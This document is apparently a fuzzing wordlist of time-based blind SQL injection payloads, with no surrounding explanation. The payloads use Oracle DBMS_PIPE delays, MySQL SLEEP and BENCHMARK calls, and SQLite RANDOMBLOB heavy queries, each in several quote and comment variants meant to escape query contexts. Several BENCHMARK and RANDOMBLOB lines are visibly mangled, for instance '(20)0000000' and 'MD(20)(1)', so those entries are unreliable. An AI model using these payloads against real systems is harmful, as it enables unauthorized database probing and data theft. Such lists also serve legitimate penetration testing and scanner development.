1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),(20))
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),(20))-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),(20)) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),(20)) AND ('1337'='1337) 
AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),(20)) AND (1337=1337
sleep((20))#
(sleep (20))--
(sleep (20))
(sleep((20)))--
(sleep((20)))
-sleep((20))
SLEEP((20))#
SLEEP((20))--
SLEEP((20))="
SLEEP((20))='
";sleep (20)--
";sleep (20)
";sleep((20))--
";sleep((20))
";SELECT SLEEP((20)); #
1 SELECT SLEEP((20)); #
+ SLEEP((20)) + '
&&SLEEP((20))
&&SLEEP((20))--
&&SLEEP((20))#
;sleep (20)--
;sleep (20)
;sleep((20))--
;sleep((20))
;SELECT SLEEP((20)); #
'&&SLEEP((20))&&'1
' SELECT SLEEP((20)); #
benchmark((20)0000000,MD(20)(1))
benchmark((20)0000000,MD(20)(1))--
benchmark((20)0000000,MD(20)(1))#
or benchmark((20)0000000,MD(20)(1))
or benchmark((20)0000000,MD(20)(1))--
or benchmark((20)0000000,MD(20)(1))#
ORDER BY SLEEP((20))
ORDER BY SLEEP((20))--
ORDER BY SLEEP((20))#
AND (SELECT 1337 FROM (SELECT(SLEEP((20))))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP((20))))YYYY)-- 1337
RANDOMBLOB((20)00000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB((20)00000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB((20)00000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))